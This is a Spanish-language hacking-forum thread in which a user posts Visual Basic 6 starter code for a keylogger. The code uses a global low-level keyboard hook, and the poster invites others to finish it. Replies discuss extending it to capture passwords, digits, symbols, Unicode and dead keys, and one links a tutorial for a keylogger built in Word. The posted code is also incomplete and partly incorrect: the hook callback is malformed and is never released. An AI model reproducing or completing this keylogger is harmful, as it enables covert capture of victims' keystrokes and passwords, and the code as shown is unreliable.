elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Prinsipio de un KeyloggerHook
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Prinsipio de un KeyloggerHook  (Leído 3,330 veces)
Flamer


Desconectado Desconectado

Mensajes: 1.051


crack, crack y mas crack...


Ver Perfil WWW
Prinsipio de un KeyloggerHook
« en: 31 Mayo 2013, 04:48 am »

hola amigos aqui les traigo un aporte para los que no saben como hacer un keylogger hook aqui les doy una idea de como pueden empesarlo

Code Form
Código:
Private Sub Form_Load()
If App.PrevInstance Then: End
TecladoHook
End Sub


Code Modulo
Código:
Option Explicit

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long

Private Const WH_KEYBOARD_LL As Long = 13

Private Hook As Long
Public Function TecladoHook()
Hook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf TeclaPresionadas, App.hInstance, 0)
End Function
Public Function TeclaPresionadas(ByVal wParam As Long, lParam As Long) As Long

Dim zx As Integer

For zx = 65 To 90
   If GetAsyncKeyState(zx) Then
      MsgBox Chr(zx)
      Exit For
   End If
Next zx
End Function

ahora si a compilarlo y ejecutarlo

Nota 1: aclaro el code es mio no lo copie de otra parte como otros por hay
Nota 2: esto es solo una probadita de como hacer un hook al teclado ustedes pongan lo demas

Saludos Flamer y espero les sirva



En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Prinsipio de un KeyloggerHook
« Respuesta #1 en: 31 Mayo 2013, 08:35 am »

Siempre Desenganchar el Hook con la api correspondiente.

Y por cierto, en que momento no hay un handle a la base del proceso?
Código:
If App.PrevInstance Then: End
Yo lo dudo.


En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Prinsipio de un KeyloggerHook
« Respuesta #2 en: 31 Mayo 2013, 15:59 pm »

Y por cierto, en que momento no hay un handle a la base del proceso?
Código:
If App.PrevInstance Then: End
Yo lo dudo.
No confundas PrevInstance con hInstance.
En línea

tincopasan


Desconectado Desconectado

Mensajes: 1.286

No es lo mismo conocer el camino que recorrerlo.


Ver Perfil
Re: Prinsipio de un KeyloggerHook
« Respuesta #3 en: 31 Mayo 2013, 19:04 pm »

En un principio está bien, pero está muy alto el rango de teclas! no podrás capturar números! y si pretenden capturar pass ¿quién no usa números?
En línea

MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.471


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: Prinsipio de un KeyloggerHook
« Respuesta #4 en: 31 Mayo 2013, 19:53 pm »

En un principio está bien, pero está muy alto el rango de teclas! no podrás capturar números! y si pretenden capturar pass ¿quién no usa números?

Y símbolos "raros"...  ;D
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

LeandroA
Moderador
***
Desconectado Desconectado

Mensajes: 760


www.leandroascierto.com


Ver Perfil WWW
Re: Prinsipio de un KeyloggerHook
« Respuesta #5 en: 31 Mayo 2013, 21:21 pm »

Hola, ya que esta el tema les comparto este keylooger echo en Microsoft Word, es muy completo en su forma de capturar

http://www.taringa.net/posts/hazlo-tu-mismo/15626505/Como-hacer-un-keyLogger-en-Microsoft-Word.html

Saludos.
En línea

MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.471


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: Prinsipio de un KeyloggerHook
« Respuesta #6 en: 31 Mayo 2013, 21:42 pm »

Me ha gustado mucho ese keylogger!!!

Gracias por compartir!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

Flamer


Desconectado Desconectado

Mensajes: 1.051


crack, crack y mas crack...


Ver Perfil WWW
Re: Prinsipio de un KeyloggerHook
« Respuesta #7 en: 31 Mayo 2013, 22:03 pm »

En un principio está bien, pero está muy alto el rango de teclas! no podrás capturar números! y si pretenden capturar pass ¿quién no usa números?

Y símbolos "raros"...  ;D
Es solo para explicar como enganchar el teclado, es solo el PRINCIPIO DEL KEYLOGGER HOOK.

no pienso poner todo el keylogger completo para que un lamber venga y lo copie todo y sin hacer nada no señor.

saludos flamer y nose si me entiendan

Notas: es solo el prinsipio y para que sepan como enganchar el teclado, para no usar timer
En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Prinsipio de un KeyloggerHook
« Respuesta #8 en: 31 Mayo 2013, 22:41 pm »

No confundas PrevInstance con hInstance.

Buena vision Karcrack, Yo simplemente mire e imagine, Aparte que tengo años de no programar en VB.

Para numeros esto asi de simple, el problema es que el bucle compara y procesa solo si es un alfabetica,
En teclados rusos, chinos, Arabes, debes de usar Funciones unicode para poder captar correctamente.

Y recomiendo no usar GetKeynametext debido a que esta función tomara el nombre de una lista generada por el driver
del teclado por lo que si el keylogger esta en un sistema con un teclado ruso nombres de teclas seran mostradas
en ruso, etc.
Para simbolos como @[]+°-~|'}{¬ usar las flags de la estructura  KBDLLHOOKSTRUCT
 ( la cual no veo porque este tio uso GetAsyncKeyState, esta estructura tiene la información de la pulsación ) y trasladarla usando ToAscii/unicode.
Lo más complicado es capturar las teclas muertas Y recordar que cada hilo tiene su propio estado de teclas ( mirar ultimo parametro de SetWindowsHookEx y leer ).
He analizado monton de malware mier* que es llamado profesional y ni siquiera saben como programarlos para soporte unicode.



« Última modificación: 31 Mayo 2013, 22:44 pm por x64Core » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines